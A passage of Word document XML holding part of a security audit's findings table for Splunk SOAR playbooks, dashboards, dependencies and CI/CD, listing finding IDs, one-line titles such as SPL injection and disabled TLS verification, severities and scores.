            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Destructive automated response with no approval gate or protected-entity allow-list</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>7.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR playbooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB2-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Attacker-steerable host shutdown and network isolation in the log4j respond pack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>7.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR playbooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEP-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Build toolchain dependency tree unlocked: 65 transitive packages float with no lockfile or hashes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6B800"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>6.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dependencies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEP-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>All 28 GitHub Action references use mutable major tags; third-party actions run with PAT and AWS keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6B800"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>6.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dependencies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Unescaped input interpolated into SOAR REST _filter_* query strings (filter/parameter injection)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6B800"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>6.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR custom functions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>container_update mass-assignment via input_json with no key allow-list</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6B800"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>6.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR custom functions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Splunkbase session token printed to CI logs by ta_update.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6B800"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>6.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI/CD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB2-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Cleartext new password written into a SOAR container comment and action output</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6B800"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>6.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR playbooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB2-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SPL injection via untrusted CEF fields in Splunk run query templates (multiple playbooks)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6B800"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>6.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR playbooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SPL injection via weakly-quoted dashboard token $story$ (ESCU summary dashboard)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6B800"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>6.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Splunk app and dashboards</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SPL injection via unquoted $policyname$/$eventcode$ tokens with auto-run on load (AppLocker dashboard)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6B800"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>6.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Splunk app and dashboards</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEP-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Splunk apps, attack data and container images downloaded without integrity verification from mutable locations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6B800"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>6.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dependencies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>TLS verification disabled on every custom-function REST call (30+ sites)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6B800"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR custom functions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB2-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Non-cryptographic PRNG used to generate the new Active Directory password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6B800"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR playbooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
